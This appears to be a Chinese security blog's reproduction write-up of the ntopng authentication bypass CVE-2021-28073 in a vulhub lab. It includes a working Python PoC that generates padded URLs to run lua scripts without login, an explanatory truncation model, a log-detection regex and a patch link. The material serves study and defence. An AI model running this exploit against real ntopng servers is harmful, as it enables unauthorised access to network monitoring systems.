ntopng authentication bypass (CVE-2021-28073): vulnerability reproduction

Category: Security vulnerabilities

Introduction

 

ntopng is a web-based network traffic analysis and flow collection tool. CVE-2021-28073 is an authentication bypass in its web interface. Requests that look like static resources (a path ending in .css) are served without a login, and the PoC below pads the request path with ./ segments so that, once the server prepends its lua directory and copies the result into a fixed-size path buffer, the trailing .css is cut off: the server then executes the requested lua script without any authentication.

 

 

Environment setup

 

https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073


 

Run the following command in the vulhub directory to start ntopng:

docker-compose up -d



Open http://your-ip:3000; you are redirected to the login page. Log in with admin/admin to confirm the instance works.

 



 

 

Vulnerability reproduction

 

PoC (poc.py):

import argparse
import logging
import sys

import requests


def is_ntopng() -> bool:
    """An unauthenticated GET / on ntopng answers 302 to /lua/login.lua."""
    response = session.get(base_url, allow_redirects=False)
    return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')


def get_base_length() -> int:
    """Brute-force the length of the server-side lua directory prefix.

    The request path is padded with '%2e%2f' ('./' after URL decoding) until
    prefix + padding + script name fills the 254 usable bytes of the server's
    255-byte path buffer. At that point the '.css' suffix is truncated away and
    the lua script is served (status < 300) instead of a redirect or 404.
    """
    for name in ('as_stats.lua', 'get_macs_data.lua'):
        for i in range(90, 120):
            url = base_url + '/lua/' + '%2e%2f' * i + name + '.css'
            response = session.get(url, allow_redirects=False)
            logging.debug('%d x ./ + %s -> %d', i, name, response.status_code)
            if response.status_code < 300:
                return 255 - 1 - i * 2 - len(name)

    return -1


def get_padding_length(path: str) -> int:
    """Number of './' pairs needed so that base_length + padding + len(path) == 254."""
    padding_length = 255 - 1 - base_length - len(path)
    if padding_length < 0 or padding_length % 2 == 1:
        raise RuntimeError(f'path {path} is not supported: a padding of {padding_length} bytes cannot be built from "./" pairs')

    return padding_length // 2


logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
session = requests.Session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')
    parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)
    parser.add_argument('-v', '--verbose', default=False, action='store_true')

    subparsers = parser.add_subparsers(dest='action')

    baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')

    generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')
    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)

    # Declared by the script, but no handler for it exists below.
    include_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')
    include_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    include_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)

    args = parser.parse_args()
    if not args.action:
        parser.print_help()
        sys.exit(1)

    if args.verbose:
        # basicConfig() is a no-op once configured, so raise the level on the root logger instead
        logging.getLogger().setLevel(logging.DEBUG)

    base_url = args.url.rstrip('/')

    # check target
    if not is_ntopng():
        raise RuntimeError('No Ntopng detected')

    if args.action == 'baselength':
        base_length = get_base_length()
        sys.stdout.write(f'ntopng install path length: {base_length}\n')
    elif args.action == 'generate':
        base_length = args.length
        path = args.path
        sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.css\n')
    else:
        sys.exit(f'action {args.action!r} is declared but not implemented in this script')


Run the script to work out the length of the ntopng lua directory, i.e. the prefix the server prepends to the requested script path:

python3 poc.py --url http://192.168.204.131:3000/ baselength


 



Use the PoC to generate the unauthenticated-access URL (36 is the length reported by the previous step, find_prefs.lua the script to reach):

python3 poc.py --url http://192.168.204.131:3000/ generate -l 36 -p find_prefs.lua


 



A direct request for /lua/find_prefs.lua without a session answers with a 302 redirect to the login page, so there is no access without authentication.

Requesting the generated URL instead returns the normal page content: the script runs without any login.
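Why the generated URL gets past the login check, as an added example (my own code, not from the original post, vulhub or ntopng). The PoC's arithmetic 255 - 1 - base_length - len(path) implies a 255-byte path buffer on the server side (254 usable characters plus the terminator). The model below assumes that the login check is skipped for URIs ending in a static extension such as .css, that the server URL-decodes the path, prepends the lua directory and copies the result into that buffer with snprintf-style truncation, and it uses a constructed 36-character directory /usr/local/share/ntopng/scripts/lua/ to match the length found above. It also runs a simple detection over constructed access-log lines, so the same arithmetic can be used from the defender's side.

```python
"""Model of the CVE-2021-28073 path truncation (added example, not ntopng code)."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

PATH_BUF = 255                                      # assumed: buffer size behind the PoC's "255 - 1"
LUA_DIR = "/usr/local/share/ntopng/scripts/lua/"   # constructed 36-char prefix, matches "-l 36" above
STATIC_EXT = (".css", ".js", ".png")                # assumed: extensions served without a login check


def padding_pairs(base_length: int, lua_path: str) -> int:
    """Number of './' pairs so that base_length + 2*pairs + len(lua_path) == PATH_BUF - 1.

    Returns -1 when the gap is negative or odd (a './' pair is two bytes), which is
    the case the PoC rejects with "is not support".
    """
    gap = PATH_BUF - 1 - base_length - len(lua_path)
    return gap // 2 if gap >= 0 and gap % 2 == 0 else -1


def build_bypass_url(base_url: str, base_length: int, lua_path: str) -> str:
    """Same construction as the PoC's 'generate' action."""
    pairs = padding_pairs(base_length, lua_path)
    if pairs < 0:
        raise ValueError(f"{lua_path}: cannot be reached with './' padding")
    return base_url.rstrip("/") + "/lua/" + "%2e%2f" * pairs + lua_path + ".css"


def requires_login(uri: str) -> bool:
    """Simplified auth gate: anything that looks like a static resource is exempt."""
    return not urlsplit(uri).path.endswith(STATIC_EXT)


def server_path(uri: str, lua_dir: str = LUA_DIR) -> str:
    """Filesystem path the server ends up opening: decode, prepend lua_dir,
    copy into the fixed buffer (snprintf-style truncation), then normalise."""
    rel = unquote(urlsplit(uri).path)[len("/lua/"):]
    truncated = (lua_dir + rel)[:PATH_BUF - 1]
    return posixpath.normpath(truncated)


def serve(uri: str, logged_in: bool = False) -> str:
    """What an unauthenticated client sees: a redirect, or the script that gets executed."""
    if requires_login(uri) and not logged_in:
        return "302 -> /lua/login.lua"
    return "200 " + server_path(uri)


# --- detection over access-log lines (constructed samples, combined log format) ---
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# a run of encoded or literal './' (or '../') under /lua/, then '<script>.lua.<static ext>'
BYPASS_RE = re.compile(r"^/lua/(?:(?:%2e|\.){1,2}(?:%2f|/)){8,}\S*\.lua\.(?:css|js|png)$", re.I)

SAMPLE_LOG = [
    '192.168.204.1 - - [20/Apr/2021:10:00:01 +0000] "GET /lua/login.lua HTTP/1.1" 200 5120',
    '192.168.204.1 - - [20/Apr/2021:10:00:02 +0000] "GET /lua/' + "%2e%2f" * 102
    + 'find_prefs.lua.css HTTP/1.1" 200 2048',
    '192.168.204.1 - - [20/Apr/2021:10:00:03 +0000] "GET /css/ntopng.css HTTP/1.1" 200 9000',
]


def flag_bypass_attempts(lines) -> list:
    """Request paths that pair a long './' run under /lua/ with a '.lua.<static>' suffix."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and BYPASS_RE.match(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    url = build_bypass_url("http://192.168.204.131:3000/", 36, "find_prefs.lua")
    print(url)
    print(serve("http://192.168.204.131:3000/lua/find_prefs.lua"))   # 302 without a session
    print(serve(url))                                                   # 200, find_prefs.lua executed
    print(flag_bypass_attempts(SAMPLE_LOG))
```

Dropping a single %2e%2f pair from the generated URL leaves the path two bytes short, so the truncated copy ends in find_prefs.lua.c rather than find_prefs.lua and nothing is executed; that is why baselength has to be exact, and why scripts whose name length makes the gap odd cannot be reached with ./ padding alone.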


 

 

Remediation

 

Upgrade to an ntopng release that contains the upstream fix: https://github.com/ntop/ntopng/commit/e8b9721479f401f595c5c7bb151819aceb03ad71



This article was first published on the WeChat public account 锋刃科技: ntopng authentication bypass (CVE-2021-28073): vulnerability reproduction
